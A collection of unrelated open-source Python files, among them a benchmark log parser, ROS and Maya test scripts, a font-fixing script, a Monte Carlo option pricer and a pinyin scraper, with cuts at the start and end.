sec += float(match.group(2))
data.append(sec)
for exp in [major, minor, inputs, outputs]:
match = exp.match(line)
if match:
data.append(int(match.group(1)))
break
match = end.match(line)
if match:
workload.append(data)
def parse_bench_ops_sec(values_dict, fn):
start = re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.* (\d+) ops/sec;\s+([0-9\.]+) MB/s')
rwrandomstart = re.compile(r'readrandomwriterandom\s*:.* (\d+) ops/sec;')
total_occ_dict = {}
with open(fn) as f:
data = None
for line in f.readlines():
if data == None:
match = start.match(line)
if match:
curr_workload = match.group(1)
ops = match.group(4)
values_dict.setdefault(curr_workload, 0)
values_dict[curr_workload] += int(ops)
total_occ_dict.setdefault(curr_workload, 0)
total_occ_dict[curr_workload] += 1
data = None
match = rwrandomstart.match(line)
if match:
curr_workload = 'readrandomwriterandom'
ops = match.group(1)
values_dict.setdefault(curr_workload, 0)
values_dict[curr_workload] += int(ops)
total_occ_dict.setdefault(curr_workload, 0)
total_occ_dict[curr_workload] += 1
data = None
continue
for key in total_occ_dict.keys():
values_dict[key] /= total_occ_dict[key]
def parse_bench_throughput(values_dict, fn, workloads):
start = re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.*;\s+([0-9\.]+) MB/s')
rwrandomstart = re.compile(r'readrandomwriterandom\s*:.*;')
elap = re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)')
end = re.compile(r'\tExit status: \d+')
with open(fn) as f:
data = None
for line in f.readlines():
if data == None:
match = start.match(line)
if match:
curr_workload = match.group(1)
load_set = set(workloads)
load_set.remove(curr_workload)
other_workload = load_set.pop()
workload = values_dict[(curr_workload, other_workload)]
throughput = match.group(4)
data = [0, float(throughput)]
# note: elapsed time is not needed here, and the tool output sometimes gets intermixed
workload.append(data)
data = None
match = rwrandomstart.match(line)
if match:
curr_workload = 'readrandomwriterandom'
load_set = set(workloads)
load_set.remove(curr_workload)
other_workload = load_set.pop()
workload = values_dict[(curr_workload, other_workload)]
data = [0, 1]
# note: elapsed time is not needed here, and the tool output sometimes gets intermixed
workload.append(data)
data = None
continue
match = elap.match(line)
if match:
sec = 60 * int(match.group(1))
sec += float(match.group(2))
data.insert(0, sec)
continue
match = end.match(line)
if match:
workload.append(data)
data = None
def generate_combos():
wkload_combos = []
# needs to be in same order as iterated through in generate-result-*.sh
for seq in ["readseq", "readreverse"]:
#for rand in ["readrandom", "readrandomwriterandom"]:
#for rand in ["mixgraph"]:
for rand in ["readrandom", "readrandomwriterandom", "mixgraph"]:
wkload_combos.append((seq,rand))
return wkload_combos
def parse_detail_file(dict_exp, file_path) -> defaultdict:
combos = generate_combos()
i = 0
with open(os.path.join(os.curdir, file_path)) as f:
lines = f.readlines()
curr_exp = None
for line in lines:
values = line.split()
if len(values) == 2:
if values[1] == '1':
curr_exp = values[0]
while curr_exp not in combos[i]:
i += 1
if i == len(combos):
print(f'detail file {file_path} badly formatted')
print(f'{curr_exp} not in combos {combos}')
sys.exit(1)
background_exp = set(combos[i])
background_exp.remove(curr_exp)
background_exp = background_exp.pop()
curr_exp = (curr_exp, background_exp)
i += 1
elif values[0] not in curr_exp:
print(f'detail file {file_path} badly formatted')
sys.exit(1)
else:
if curr_exp == None:
print(f'detail file {file_path} badly formatted')
sys.exit(1)
x = 0 if len(dict_exp[curr_exp]) == 0 else dict_exp[curr_exp][-1][0] + float(values[4])
dict_exp[curr_exp].append([x, float(values[2])])
return dict_exp
def parse_kern_log_file(file_path) -> defaultdict:
dict_exp = defaultdict(list)
with open(os.path.join(os.curdir, file_path)) as f:
lines = f.readlines()
for line in lines:
values = line.split()
if len(values) == 2:
curr_exp = tuple(values)
elif values[5] == 'readahead':
dict_exp[curr_exp].append(float(values[8]))
return dict_exp
def mean(arr):
return sum(arr)/len(arr)
|
network/demo_espat_ap_test.py | 708yamaguchi/MaixPy_scripts | 485 | 30655 | <reponame>708yamaguchi/MaixPy_scripts
# This file is part of MaixPY
# Copyright (c) sipeed.com
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
from network_espat import wifi
wifi.reset()
print(wifi.at_cmd("AT\r\n"))
print(wifi.at_cmd("AT+GMR\r\n"))
'''
>>> reset...
b'\r\n\r\nOK\r\n'
b'AT version:1.1.0.0(May 11 2016 18:09:56)\r\nSDK version:1.5.4(baaeaebb)\r\ncompile time:May 20 2016 15:06:44\r\nOK\r\n'
MicroPython v0.5.1-136-g039f72b6c-dirty on 2020-11-18; Sipeed_M1 with kendryte-k210
Type "help()" for more information.
>>>
'''
|
stockroom_bot/stock_products.py | amjadmajid/rosbook | 442 | 30660 | <filename>stockroom_bot/stock_products.py
#!/usr/bin/env python
import rospy, tf
from gazebo_msgs.srv import *
from geometry_msgs.msg import *
if __name__ == '__main__':
rospy.init_node("stock_products")
rospy.wait_for_service("gazebo/delete_model") # <1>
rospy.wait_for_service("gazebo/spawn_sdf_model")
delete_model = rospy.ServiceProxy("gazebo/delete_model", DeleteModel)
s = rospy.ServiceProxy("gazebo/spawn_sdf_model", SpawnModel)
orient = Quaternion(*tf.transformations.quaternion_from_euler(0, 0, 0))
with open("models/product_0/model.sdf", "r") as f:
product_xml = f.read() # <2>
for product_num in xrange(0, 12):
item_name = "product_{0}_0".format(product_num)
delete_model(item_name) # <3>
for product_num in xrange(0, 12):
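# The 12 products form a 2 x 6 grid of bins: Python 2 integer division by 6 picks the row
# (y offset) and the remainder picks the column (x offset).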
bin_y = 2.8 * (product_num / 6) - 1.4 # <4>
bin_x = 0.5 * (product_num % 6) - 1.5
item_name = "product_{0}_0".format(product_num)
item_pose = Pose(Point(x=bin_x, y=bin_y, z=2), orient) # <5>
s(item_name, product_xml, "", item_pose, "world") # <6>
|
openspeech/search/beam_search_ctc.py | techthiyanes/openspeech | 207 | 30676 | <reponame>techthiyanes/openspeech<filename>openspeech/search/beam_search_ctc.py<gh_stars>100-1000
# MIT License
#
# Copyright (c) 2021 <NAME> and <NAME> and <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import torch.nn as nn
from openspeech.utils import CTCDECODE_IMPORT_ERROR
class BeamSearchCTC(nn.Module):
r"""
Decodes probability output using ctcdecode package.
Args:
labels (list): the tokens you used to train your model
lm_path (str): the path to your external kenlm language model(LM).
alpha (int): weighting associated with the LMs probabilities.
beta (int): weight associated with the number of words within our beam
cutoff_top_n (int): cutoff number in pruning. Only the top cutoff_top_n characters with the highest probability
in the vocab will be used in beam search.
cutoff_prob (float): cutoff probability in pruning. 1.0 means no pruning.
beam_size (int): this controls how broad the beam search is.
num_processes (int): parallelize the batch using num_processes workers.
blank_id (int): this should be the index of the CTC blank token
Inputs: logits, sizes
- logits: Tensor of character probabilities, where probs[c,t] is the probability of character c at time t
- sizes: Size of each sequence in the mini-batch
Returns:
- outputs: sequences of the model's best prediction
"""
def __init__(
self,
labels: list,
lm_path: str = None,
alpha: int = 0,
beta: int = 0,
cutoff_top_n: int = 40,
cutoff_prob: float = 1.0,
beam_size: int = 3,
num_processes: int = 4,
blank_id: int = 0,
) -> None:
super(BeamSearchCTC, self).__init__()
try:
from ctcdecode import CTCBeamDecoder
except ImportError:
raise ImportError(CTCDECODE_IMPORT_ERROR)
assert isinstance(labels, list), "labels must be an instance of list"
self.decoder = CTCBeamDecoder(labels, lm_path, alpha, beta, cutoff_top_n,
cutoff_prob, beam_size, num_processes, blank_id)
def forward(self, logits, sizes=None):
r"""
Decodes probability output using ctcdecode package.
Inputs: logits, sizes
logits: Tensor of character probabilities, where probs[c,t] is the probability of character c at time t
sizes: Size of each sequence in the mini-batch
Returns:
outputs: sequences of the model's best prediction
"""
logits = logits.cpu()
outputs, scores, offsets, seq_lens = self.decoder.decode(logits, sizes)
return outputs
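# Illustrative usage sketch (not part of the original file); `labels` is the token list used for
# training and `logits`/`input_lengths` are assumed to come from an acoustic model:
#
# decoder = BeamSearchCTC(labels=labels, beam_size=3, blank_id=0)
# best_paths = decoder(logits, sizes=input_lengths)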
|
spinoffs/inference_gym/inference_gym/targets/eight_schools_test.py | PavanKishore21/probability | 3,670 | 30679 | # Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for inference_gym.targets.eight_schools."""
import tensorflow.compat.v2 as tf
from inference_gym.internal import test_util
from inference_gym.targets import eight_schools
@test_util.multi_backend_test(globals(), 'targets.eight_schools_test')
class EightSchoolsTest(test_util.InferenceGymTestCase):
def testEightSchools(self):
"""Checks that unconstrained parameters yield finite joint densities."""
model = eight_schools.EightSchools()
self.validate_log_prob_and_transforms(
model,
sample_transformation_shapes=dict(identity={
'avg_effect': [],
'log_stddev': [],
'school_effects': [8],
}),
check_ground_truth_mean_standard_error=True,
check_ground_truth_mean=True,
check_ground_truth_standard_deviation=True)
@test_util.numpy_disable_gradient_test
def testEightSchoolsHMC(self):
"""Checks approximate samples from the model against the ground truth."""
model = eight_schools.EightSchools()
self.validate_ground_truth_using_hmc(
model,
num_chains=4,
num_steps=4000,
num_leapfrog_steps=10,
step_size=0.4,
)
if __name__ == '__main__':
tf.test.main()
|
pylayers/antprop/examples/ex_meta.py | usmanwardag/pylayers | 143 | 30696 | from pylayers.gis.layout import *
from pylayers.antprop.signature import *
from pylayers.antprop.channel import *
import pylayers.signal.waveform as wvf
import networkx as nx
import numpy as np
import time
import logging
L = Layout('WHERE1_clean.ini')
#L = Layout('defstr2.ini')
try:
L.dumpr()
except:
L.build()
L.dumpw()
#L.build()
#L.dumpw()
#L.buildGi()
nc1 = 6#5
nc2 = 25#37
poly1 = L.Gt.node[nc1]['polyg']
cp1 = poly1.centroid.xy
poly2 = L.Gt.node[nc2]['polyg']
cp2 = poly2.centroid.xy
ptx = np.array([cp1[0][0],cp1[1][0],1.5])
prx = np.array([cp2[0][0]+0.5,cp2[1][0]+0.5,1.5])
print ptx
print prx
d = np.sqrt(np.dot((ptx-prx),(ptx-prx)))
tau = d/0.3
print d,tau
logging.info('Signature')
S = Signatures(L,nc1,nc2)
a =time.time()
logging.info('Calculate signature')
#S.run2(cutoff=6,dcut=3)
S.run(cutoff=2)
b=time.time()
print b-a
for i in L.Gi.nodes():
ei = eval(i)
if type(ei)!= int:
if ei[0] == 354:
print i
#Gsi.add_node('Tx')
#Gsi.pos['Tx']=tuple(ptx[:2])
#for i in L.Gt.node[nc1]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge('Tx',i)
#Gsi.add_node('Rx')
#Gsi.pos['Rx']=tuple(prx[:2])
#for i in L.Gt.node[nc2]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge(i,'Rx')
#print 'signatures'
#co = nx.dijkstra_path_length(Gsi,'Tx','Rx')
#sig=list(nx.all_simple_paths(Gsi,'Tx','Rx',cutoff=co+2))
#b=time.time()
#print b-a
#f,ax=L.showG('t')
#nx.draw(Gsi,Gsi.pos,ax=ax)
#plt.show()
##S.run(L,metasig,cutoff=3)
#print "r = S.rays "
r = S.rays(ptx,prx)
print "r3 = r.to3D "
r3 = r.to3D()
print "r3.locbas "
r3.locbas(L)
#print "r3.fillinter "
r3.fillinter(L)
r3.show(L)
plt.show()
##
#config = ConfigParser.ConfigParser()
#_filesimul = 'default.ini'
#filesimul = pyu.getlong(_filesimul, "ini")
#config.read(filesimul)
#fGHz = np.linspace(eval(config.get("frequency", "fghzmin")),
# eval(config.get("frequency", "fghzmax")),
# eval(config.get("frequency", "nf")))
#
#Cn=r3.eval(fGHz)
#
#Cn.freq=Cn.fGHz
#sco=Cn.prop2tran(a='theta',b='theta')
#wav = wvf.Waveform()
#ciro = sco.applywavB(wav.sfg)
#
##raynumber = 4
#
##fig=plt.figure('Cpp')
##f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
#
##r3d.info(raynumber)
## plt.show()
##
##
##
###
###c11 = r3d.Ctilde[:,:,0,0]
###c12 = r3d.Ctilde[:,:,0,1]
###c21 = r3d.Ctilde[:,:,1,0]
###c22 = r3d.Ctilde[:,:,1,1]
###
###
###
###Cn=Ctilde()
###Cn.Cpp = bs.FUsignal(r3d.I.f, c11)
###Cn.Ctp = bs.FUsignal(r3d.I.f, c12)
###Cn.Cpt = bs.FUsignal(r3d.I.f, c21)
###Cn.Ctt = bs.FUsignal(r3d.I.f, c22)
###Cn.nfreq = r3d.I.nf
###Cn.nray = r3d.nray
###Cn.tauk=r3d.delays
###
###raynumber = 4
###
###fig=plt.figure('Cpp')
###f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
###
##
##
##
##
##
##
|
package/awesome_panel/application/services/message_service.py | Jhsmit/awesome-panel | 179 | 30712 | """This module implements the MessageService
The MessageService enables sending and receiving messages
"""
import param
class MessageService(param.Parameterized):
"""The MessageService enables sending and receiving messages"""
|
herokuapp/project_template/manage.py | urkonn/django-herokuapp | 262 | 30714 | <filename>herokuapp/project_template/manage.py
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
# Load the Heroku environment.
from herokuapp.env import load_env
load_env(__file__, "{{ app_name }}")
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "{{ project_name }}.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
scripts/touchup_for_web.py | BennZoll/roboto | 3,933 | 30719 | <reponame>BennZoll/roboto<gh_stars>1000+
#!/usr/bin/python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Post-build web fonts changes for Roboto."""
import sys
from fontTools import ttLib
from nototools import font_data
import temporary_touchups
def apply_web_specific_fixes(font, unhinted, family_name):
"""Apply fixes needed for web fonts."""
# set vertical metrics to old values
hhea = font['hhea']
hhea.ascent = 1900
hhea.descent = -500
os2 = font['OS/2']
os2.sTypoAscender = 1536
os2.sTypoDescender = -512
os2.sTypoLineGap = 102
os2.usWinAscent = 1946
os2.usWinDescent = 512
# correct anything else needed for both web and Chrome OS
apply_web_cros_common_fixes(font, unhinted, family_name)
def apply_web_cros_common_fixes(font, unhinted, family_name):
"""Apply fixes needed for web and CrOS targets"""
subfamily_name = font_data.get_name_records(font)[2].encode('ASCII')
assert(subfamily_name in
['Thin', 'Thin Italic',
'Light', 'Light Italic',
'Regular', 'Italic',
'Medium', 'Medium Italic',
'Bold', 'Bold Italic',
'Black', 'Black Italic'])
if 'Condensed' in font_data.get_name_records(font)[1]:
family_name += ' Condensed'
full_name = family_name
if subfamily_name != 'Regular':
full_name += ' ' + subfamily_name
# Family, subfamily names
font_data.set_name_record(font, 16, family_name)
style_map = ['Regular', 'Bold', 'Italic', 'Bold Italic']
if subfamily_name in style_map:
font_data.set_name_record(font, 1, family_name)
else:
weight = subfamily_name.split()[0]
new_family_name = family_name
if weight != 'Regular':
new_family_name += ' ' + weight
font_data.set_name_record(font, 1, new_family_name)
# all weights outside regular and bold should only have subfamily
# "Regular" or "Italic"
italic = subfamily_name.endswith('Italic')
font_data.set_name_record(font, 2, style_map[italic << 1])
# Unique identifier and full name
font_data.set_name_record(font, 3, full_name)
font_data.set_name_record(font, 4, full_name)
font_data.set_name_record(font, 18, None)
# PostScript name
font_data.set_name_record(
font, 6, (family_name+'-'+subfamily_name).replace(' ', ''))
# Copyright message
font_data.set_name_record(
font, 0, 'Copyright 2011 Google Inc. All Rights Reserved.')
# hotpatch glyphs by swapping
# https://github.com/google/roboto/issues/18
glyf = font['glyf']
glyf['chi'], glyf['chi.alt'] = glyf['chi.alt'], glyf['chi']
# make glyph orders consistent for feature copying
# https://github.com/google/roboto/issues/71
glyph_order = font.getGlyphOrder()
for i, glyph_name in enumerate(glyph_order):
if glyph_name.endswith('.lnum'):
new_name = glyph_name.replace('.lnum', '.pnum')
glyph_order[i] = new_name
font['glyf'][new_name] = font['glyf'][glyph_name]
# append old name to glyph order so del succeeds
glyph_order.append(glyph_name)
del font['glyf'][glyph_name]
# copy features from unhinted
# https://github.com/google/roboto/pull/163
for table in ['GDEF', 'GPOS', 'GSUB']:
font[table] = unhinted[table]
def correct_font(source_name, unhinted_name, target_font_name, family_name):
"""Corrects metrics and other meta information."""
font = ttLib.TTFont(source_name)
unhinted = ttLib.TTFont(unhinted_name)
# apply web-specific fixes before shared, so that sub/family names are
# correct for black weights and their bold bits will be set
apply_web_specific_fixes(font, unhinted, family_name)
temporary_touchups.apply_temporary_fixes(font, is_for_web=True)
temporary_touchups.update_version_and_revision(font)
font.save(target_font_name)
def main(argv):
"""Correct the font specified in the command line."""
correct_font(*argv[1:])
if __name__ == "__main__":
main(sys.argv)
|
tests/test_losses_config.py | blazejdolicki/vissl | 2,512 | 30729 | <reponame>blazejdolicki/vissl
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import unittest
from collections import namedtuple
from classy_vision.generic.distributed_util import set_cpu_device
from parameterized import parameterized
from utils import ROOT_LOSS_CONFIGS, SSLHydraConfig
from vissl.trainer.train_task import SelfSupervisionTask
from vissl.utils.hydra_config import convert_to_attrdict
logger = logging.getLogger("__name__")
set_cpu_device()
BATCH_SIZE = 2048
EMBEDDING_DIM = 128
NUM_CROPS = 2
BUFFER_PARAMS_STRUCT = namedtuple(
"BUFFER_PARAMS_STRUCT", ["effective_batch_size", "world_size", "embedding_dim"]
)
BUFFER_PARAMS = BUFFER_PARAMS_STRUCT(BATCH_SIZE, 1, EMBEDDING_DIM)
class TestRootConfigsLossesBuild(unittest.TestCase):
@parameterized.expand(ROOT_LOSS_CONFIGS)
def test_loss_build(self, filepath):
logger.info(f"Loading {filepath}")
cfg = SSLHydraConfig.from_configs(
[
filepath,
"config.DATA.TRAIN.DATA_SOURCES=[synthetic]",
"config.DATA.TEST.DATA_SOURCES=[synthetic]",
]
)
_, config = convert_to_attrdict(cfg.default_cfg)
task = SelfSupervisionTask.from_config(config)
task.datasets, _ = task.build_datasets()
self.assertTrue(task._build_loss(), "failed to build loss")
def test_pytorch_loss(self):
cfg = SSLHydraConfig.from_configs(
[
"config=test/integration_test/quick_simclr",
"config.LOSS.name=CosineEmbeddingLoss",
"+config.LOSS.CosineEmbeddingLoss.margin=1.0",
"config.DATA.TRAIN.DATA_SOURCES=[synthetic]",
"config.DATA.TEST.DATA_SOURCES=[synthetic]",
]
)
_, config = convert_to_attrdict(cfg.default_cfg)
task = SelfSupervisionTask.from_config(config)
task.datasets, _ = task.build_datasets()
self.assertTrue(task._build_loss(), "failed to build loss")
|
scale/source/apps.py | kaydoh/scale | 121 | 30747 | <gh_stars>100-1000
"""Defines the application configuration for the source application"""
from __future__ import unicode_literals
from django.apps import AppConfig
class SourceConfig(AppConfig):
"""Configuration for the source app
"""
name = 'source'
label = 'source'
verbose_name = 'Source'
def ready(self):
"""
Override this method in subclasses to run code when Django starts.
"""
# Register source file parse saver
from job.configuration.data.data_file import DATA_FILE_PARSE_SAVER
from source.configuration.source_data_file import SourceDataFileParseSaver
DATA_FILE_PARSE_SAVER['DATA_FILE_PARSE_SAVER'] = SourceDataFileParseSaver()
# Register source message types
from messaging.messages.factory import add_message_type
from source.messages.purge_source_file import PurgeSourceFile
add_message_type(PurgeSourceFile)
|
Chapter14/c14_11_rainbow_callMaxOn2_viaSimulation.py | John-ye666/Python-for-Finance-Second-Edition | 236 | 30759 | """
Name : c14_11_rainbow_callMaxOn2_viaSimulation.py
Book : Python for Finance (2nd ed.)
Publisher: Packt Publishing Ltd.
Author : <NAME>
Date : 6/6/2017
email : <EMAIL>
<EMAIL>
"""
import scipy as sp
from scipy import zeros, sqrt, shape
#
sp.random.seed(123) # fix our random numbers
s1=100. # stock price 1
s2=95. # stock price 2
k=102.0 # exercise price
T=8./12. # maturity in years
r=0.08 # risk-free rate
rho=0.75 # correlation between 2
sigma1=0.15 # volatility for stock 1
sigma2=0.20 # volatility for stock 2
nSteps=100. # number of steps
nSimulation=1000 # number of simulations
#
# step 1: generate correlated random number
dt =T/nSteps
call = sp.zeros([nSimulation], dtype=float)
x = range(0, int(nSteps), 1)
#
# step 2: call call prices
for j in range(0, nSimulation):
x1=sp.random.normal(size=nSimulation)
x2=sp.random.normal(size=nSimulation)
y1=x1
y2=rho*x1+sp.sqrt(1-rho**2)*x2
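# Cholesky-style construction: y1 and y2 are standard normals with Corr(y1, y2) = rho,
# since x1 and x2 are independent.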
sT1=s1
sT2=s2
for i in x[:-1]:
e1=y1[i]
e2=y2[i]
sT1*=sp.exp((r-0.5*sigma1**2)*dt+sigma1*e1*sqrt(dt))
sT2*=sp.exp((r-0.5*sigma2**2)*dt+sigma2*e2*sqrt(dt))
minOf2=min(sT1,sT2)
call[j]=max(minOf2-k,0)
#
# Step 3: summation and discount back
call=sp.mean(call)*sp.exp(-r*T)
print('Rainbow call on minimum of 2 assets = ', round(call,3))
|
maya/Tests/joint_test.py | ryu-sw/alembic | 921 | 30774 | <reponame>ryu-sw/alembic
##-*****************************************************************************
##
## Copyright (c) 2009-2011,
## <NAME> Imageworks, Inc. and
## Industrial Light & Magic, a division of Lucasfilm Entertainment Company Ltd.
##
## All rights reserved.
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above
## copyright notice, this list of conditions and the following disclaimer
## in the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Sony Pictures Imageworks, nor
## Industrial Light & Magic nor the names of their contributors may be used
## to endorse or promote products derived from this software without specific
## prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
##
##-*****************************************************************************
from maya import cmds as MayaCmds
import maya.OpenMaya as OpenMaya
import os
import subprocess
import unittest
import util
def createJoints():
name = MayaCmds.joint(position=(0, 0, 0))
MayaCmds.rotate(33.694356, 4.000428, 61.426019, r=True, ws=True)
MayaCmds.joint(position=(0, 4, 0), orientation=(0.0, 45.0, 90.0))
MayaCmds.rotate(62.153171, 0.0, 0.0, r=True, os=True)
MayaCmds.joint(position=(0, 8, -1), orientation=(90.0, 0.0, 0.0))
MayaCmds.rotate(70.245162, -33.242019, 41.673097, r=True, os=True)
MayaCmds.joint(position=(0, 12, 3))
MayaCmds.rotate(0.0, 0.0, -58.973851, r=True, os=True)
return name
class JointTest(unittest.TestCase):
def setUp(self):
MayaCmds.file(new=True, force=True)
self.__files = []
self.__abcStitcher = [os.environ['AbcStitcher']]
def tearDown(self):
for f in self.__files:
os.remove(f)
def testStaticJointRW(self):
name = createJoints()
# write to file
self.__files.append(util.expandFileName('testStaticJoints.abc'))
MayaCmds.AbcExport(j='-root %s -file %s' % (name, self.__files[-1]))
MayaCmds.select(name)
MayaCmds.group(name='original')
# read from file
MayaCmds.AbcImport(self.__files[-1], mode='import')
# make sure the translate and rotation are the same
nodes1 = ["|original|joint1", "|original|joint1|joint2", "|original|joint1|joint2|joint3", "|original|joint1|joint2|joint3|joint4"]
nodes2 = ["|joint1", "|joint1|joint2", "|joint1|joint2|joint3", "|joint1|joint2|joint3|joint4"]
for i in range(0, 4):
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tx'), MayaCmds.getAttr(nodes2[i]+'.tx'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.ty'), MayaCmds.getAttr(nodes2[i]+'.ty'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tz'), MayaCmds.getAttr(nodes2[i]+'.tz'), 4)
def testStaticIKRW(self):
name = createJoints()
MayaCmds.ikHandle(sj=name, ee='joint4')
MayaCmds.move(-1.040057, -7.278225, 6.498725, r=True)
# write to file
self.__files.append(util.expandFileName('testStaticIK.abc'))
MayaCmds.AbcExport(j='-root %s -f %s' % (name, self.__files[-1]))
MayaCmds.select(name)
MayaCmds.group(name='original')
# read from file
MayaCmds.AbcImport(self.__files[-1], mode='import')
# make sure the translate and rotation are the same
nodes1 = ["|original|joint1", "|original|joint1|joint2", "|original|joint1|joint2|joint3", "|original|joint1|joint2|joint3|joint4"]
nodes2 = ["|joint1", "|joint1|joint2", "|joint1|joint2|joint3", "|joint1|joint2|joint3|joint4"]
for i in range(0, 4):
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tx'), MayaCmds.getAttr(nodes2[i]+'.tx'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.ty'), MayaCmds.getAttr(nodes2[i]+'.ty'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tz'), MayaCmds.getAttr(nodes2[i]+'.tz'), 4)
def testAnimIKRW(self):
name = createJoints()
handleName = MayaCmds.ikHandle(sj=name, ee='joint4')[0]
MayaCmds.currentTime(1, update=True)
MayaCmds.setKeyframe(handleName, breakdown=0, hierarchy='none', controlPoints=False, shape=False)
MayaCmds.currentTime(16, update=True)
MayaCmds.move(-1.040057, -7.278225, 6.498725, r=True)
MayaCmds.setKeyframe(handleName, breakdown=0, hierarchy='none', controlPoints=False, shape=False)
self.__files.append(util.expandFileName('testAnimIKRW.abc'))
self.__files.append(util.expandFileName('testAnimIKRW01_08.abc'))
self.__files.append(util.expandFileName('testAnimIKRW09-16.abc'))
# write to files
MayaCmds.AbcExport(j='-fr 1 8 -root %s -f %s' % (name, self.__files[-2]))
MayaCmds.AbcExport(j='-fr 9 16 -root %s -f %s' % (name, self.__files[-1]))
MayaCmds.select(name)
MayaCmds.group(name='original')
subprocess.call(self.__abcStitcher + self.__files[-3:])
# read from file
MayaCmds.AbcImport(self.__files[-3], mode='import')
# make sure the translate and rotation are the same
nodes1 = ["|original|joint1", "|original|joint1|joint2", "|original|joint1|joint2|joint3", "|original|joint1|joint2|joint3|joint4"]
nodes2 = ["|joint1", "|joint1|joint2", "|joint1|joint2|joint3", "|joint1|joint2|joint3|joint4"]
for t in range(1, 25):
MayaCmds.currentTime(t, update=True)
for i in range(0, 4):
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tx'), MayaCmds.getAttr(nodes2[i]+'.tx'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.ty'), MayaCmds.getAttr(nodes2[i]+'.ty'), 4)
self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tz'), MayaCmds.getAttr(nodes2[i]+'.tz'), 4)
|
tools/improve_8105.py | dophist/pinyin-data | 823 | 30788 | <reponame>dophist/pinyin-data
# -*- coding: utf-8 -*-
"""补充 8105 中汉字的拼音数据"""
from collections import namedtuple
import re
import sys
from pyquery import PyQuery
import requests
re_pinyin = re.compile(r'拼音:(?P<pinyin>\S+) ')
re_code = re.compile(r'统一码\w?:(?P<code>\S+) ')
re_alternate = re.compile(r'异体字:\s+?(?P<alternate>\S+)')
HanziInfo = namedtuple('HanziInfo', 'pinyin code alternate')
def fetch_html(url, params):
response = requests.get(url, params=params)
return response.content
def fetch_info(hanzi):
url = 'http://www.guoxuedashi.com/zidian/so.php'
params = {
'sokeyzi': hanzi,
'kz': 1,
'submit': '',
}
html = fetch_html(url, params)
